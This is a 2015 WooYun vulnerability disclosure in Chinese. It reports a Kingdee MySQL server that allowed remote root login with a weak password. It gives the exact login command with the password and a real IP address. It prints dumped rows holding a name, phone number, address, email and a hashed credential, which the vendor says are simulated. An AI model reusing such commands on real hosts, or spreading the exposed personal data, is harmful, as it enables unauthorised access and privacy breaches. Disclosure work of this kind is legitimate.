当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115283

漏洞标题:金蝶某主机Mysql弱密码泄露部分员工信息

相关厂商:金蝶

漏洞作者: 撒旦之眼

提交时间:2015-05-21 10:54

修复时间:2015-07-05 11:22

公开时间:2015-07-05 11:22

漏洞类型:服务弱口令

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开

简要描述:

金蝶某主机mysql弱密码,泄露部分员工信息。

详细说明:

mysql -uroot -p123456 -h218.244.150.94

漏洞证明:

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| aucp |
| jiradb |
| mysql |
| performance_schema |
| pss |
| scrumdb |
| test |
+--------------------+
----------------
id: 1
create_date: 2015-01-29 14:59:53
modify_date: 2015-01-29 14:59:53
address: 株洲市XXXX路XXX号
amount_paid: 0.000000
area_name:
consignee: 陈大旺
coupon_discount: 0.000000
expire: NULL
fee: 0.000000
freight: 0.000000
invoice_title: NULL
is_allocated_stock:
is_invoice:
lock_expire: NULL
memo: NULL
offset_amount: 0.000000
order_status: 0
payment_method_name: 货到付款
payment_status: 0
phone: 18601100111
point: 1350
promotion: NULL
promotion_discount: 0.000000
shipping_method_name: 普通快递
shipping_status: 0
sn: 20150129606
tax: 0.000000
zip_code: 000000
area: NULL
------------------
*************************** 7. row ***************************
ID: 10211
directory_id: 1
user_name: xufeng
lower_user_name: xufeng
active: 1
created_date: 2015-01-27 16:14:13
updated_date: 2015-01-27 16:14:13
first_name:
lower_first_name:
last_name: 徐凤
lower_last_name: 徐凤
display_name: 徐凤
lower_display_name: 徐凤
email_address: xufeng@apusic.com
lower_email_address: xufeng@apusic.com
CREDENTIAL: {PKCS5S2}qeIYyiBqjdB9CPQrLhn+uKysIpsdGvY0GXrKO24IYIIYWLckNA7KxliAAdEQvUtz
deleted_externally: NULL
7 rows in set (0.01 sec)

修复方案:

不要使用弱密码且尽量不要允许外连。

版权声明:转载请注明来源 撒旦之眼@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-21 11:21

厂商回复:

谢谢关注金蝶安全,为我们发现系统漏洞。此系统为测试系统,数据为模拟数据。但反映公司人员安全意识薄弱,我们将进行内部通报。再次感谢!

最新状态:

暂无